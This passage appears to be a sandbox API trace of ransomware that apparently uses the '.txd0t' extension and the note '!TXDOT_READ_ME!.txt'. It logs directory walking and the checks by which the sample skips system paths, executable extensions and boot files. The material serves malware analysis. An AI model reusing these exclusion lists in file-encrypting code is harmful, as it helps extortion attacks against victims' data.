psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1036\\eula.rtf.txd0t" [0128.586] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0128.586] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.586] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x58430009, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x14612, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0128.586] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0128.586] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0128.586] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1036", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036") returned="C:\\588bce7c90097ed212\\1036" [0128.586] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\") returned="C:\\588bce7c90097ed212\\1036\\" [0128.586] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.txd0t" [0128.586] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0128.586] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.586] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0128.586] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0128.586] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0128.586] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1036", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036") returned="C:\\588bce7c90097ed212\\1036" [0128.586] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\") returned="C:\\588bce7c90097ed212\\1036\\" [0128.586] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1036\\SetupResources.dll" [0128.586] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.586] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.586] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0128.586] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0128.586] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0128.586] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0128.586] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0128.586] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0128.586] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0128.586] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0128.586] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0128.586] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0128.586] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0128.586] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0128.586] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0128.586] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.586] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.587] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.587] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0128.722] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.723] GetProcessHeap () returned 0xe30000 [0128.723] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.723] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58430009, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58430009, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1037", cAlternateFileName="")) returned 1 [0128.723] StrCmpW (psz1="1037", psz2=".") returned 1 [0128.723] StrCmpW (psz1="1037", psz2="..") returned 1 [0128.723] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.723] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.723] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1037", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1037") returned="C:\\588bce7c90097ed212\\1037" [0128.723] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\windows\\system32\\") returned 0x0 [0128.723] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.723] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\windows\\system\\") returned 0x0 [0128.723] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.723] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.723] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\appdata\\local\\") returned 0x0 [0128.723] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.723] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.723] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.723] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\boot\\") returned 0x0 [0128.723] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\perflogs\\") returned 0x0 [0128.723] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\programdata\\") returned 0x0 [0128.723] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\drivers\\") returned 0x0 [0128.723] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\wsus\\") returned 0x0 [0128.723] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.723] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.723] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="crypt_detect") returned 0x0 [0128.723] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="cryptolocker") returned 0x0 [0128.723] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="ransomware") returned 0x0 [0128.723] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="C:\\WINDOWS") returned 0x0 [0128.723] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.723] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1037", lpSrch="C:\\Program Files") returned 0x0 [0128.724] GetProcessHeap () returned 0xe30000 [0128.724] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x6874278 [0128.724] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1037", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037") returned="C:\\588bce7c90097ed212\\1037" [0128.724] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\*") returned="C:\\588bce7c90097ed212\\1037\\*" [0128.724] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1037\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58430009, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58430009, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.724] StrCmpW (psz1=".", psz2=".") returned 0 [0128.724] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58430009, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58430009, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.724] StrCmpW (psz1="..", psz2=".") returned 1 [0128.724] StrCmpW (psz1="..", psz2="..") returned 0 [0128.724] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x582fef30, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x582fef30, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58324e32, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.724] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.724] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.724] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1037", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037") returned="C:\\588bce7c90097ed212\\1037" [0128.724] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\") returned="C:\\588bce7c90097ed212\\1037\\" [0128.724] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1037\\!TXDOT_READ_ME!.txt" [0128.724] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.724] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.724] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.724] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.724] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.724] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.724] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.724] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.724] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.724] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.724] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.724] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.725] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.725] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.725] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.725] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.725] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x582fef30, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1cc3, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0128.725] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0128.725] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0128.725] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1037", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037") returned="C:\\588bce7c90097ed212\\1037" [0128.725] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\") returned="C:\\588bce7c90097ed212\\1037\\" [0128.725] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1037\\eula.rtf.txd0t" [0128.725] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0128.725] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.725] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x58430009, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11b8c, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0128.725] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0128.725] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0128.725] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1037", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037") returned="C:\\588bce7c90097ed212\\1037" [0128.725] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\") returned="C:\\588bce7c90097ed212\\1037\\" [0128.725] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.txd0t" [0128.725] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0128.725] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.725] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0128.725] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0128.725] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0128.725] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1037", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037") returned="C:\\588bce7c90097ed212\\1037" [0128.725] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\") returned="C:\\588bce7c90097ed212\\1037\\" [0128.725] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1037\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1037\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1037\\SetupResources.dll" [0128.725] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.725] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.725] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0128.725] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0128.725] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0128.725] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0128.725] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0128.725] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0128.725] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0128.725] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0128.726] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0128.726] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0128.726] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0128.726] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0128.726] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0128.726] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.726] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.726] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.726] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0128.726] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.726] GetProcessHeap () returned 0xe30000 [0128.726] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.726] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5847eb78, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5847eb78, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1038", cAlternateFileName="")) returned 1 [0128.726] StrCmpW (psz1="1038", psz2=".") returned 1 [0128.726] StrCmpW (psz1="1038", psz2="..") returned 1 [0128.726] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.726] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.726] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1038", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1038") returned="C:\\588bce7c90097ed212\\1038" [0128.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\windows\\system32\\") returned 0x0 [0128.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\windows\\system\\") returned 0x0 [0128.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\appdata\\local\\") returned 0x0 [0128.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\boot\\") returned 0x0 [0128.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\perflogs\\") returned 0x0 [0128.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\programdata\\") returned 0x0 [0128.726] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\drivers\\") returned 0x0 [0128.727] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\wsus\\") returned 0x0 [0128.727] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.727] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.727] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="crypt_detect") returned 0x0 [0128.727] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="cryptolocker") returned 0x0 [0128.727] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="ransomware") returned 0x0 [0128.727] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="C:\\WINDOWS") returned 0x0 [0128.727] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.727] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1038", lpSrch="C:\\Program Files") returned 0x0 [0128.727] GetProcessHeap () returned 0xe30000 [0128.727] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x6874278 [0128.727] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1038", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038") returned="C:\\588bce7c90097ed212\\1038" [0128.727] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1038", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1038\\*") returned="C:\\588bce7c90097ed212\\1038\\*" [0128.727] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1038\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5847eb78, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5847eb78, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.727] StrCmpW (psz1=".", psz2=".") returned 0 [0128.727] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5847eb78, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5847eb78, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.727] StrCmpW (psz1="..", psz2=".") returned 1 [0128.727] StrCmpW (psz1="..", psz2="..") returned 0 [0128.727] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5834b1e1, 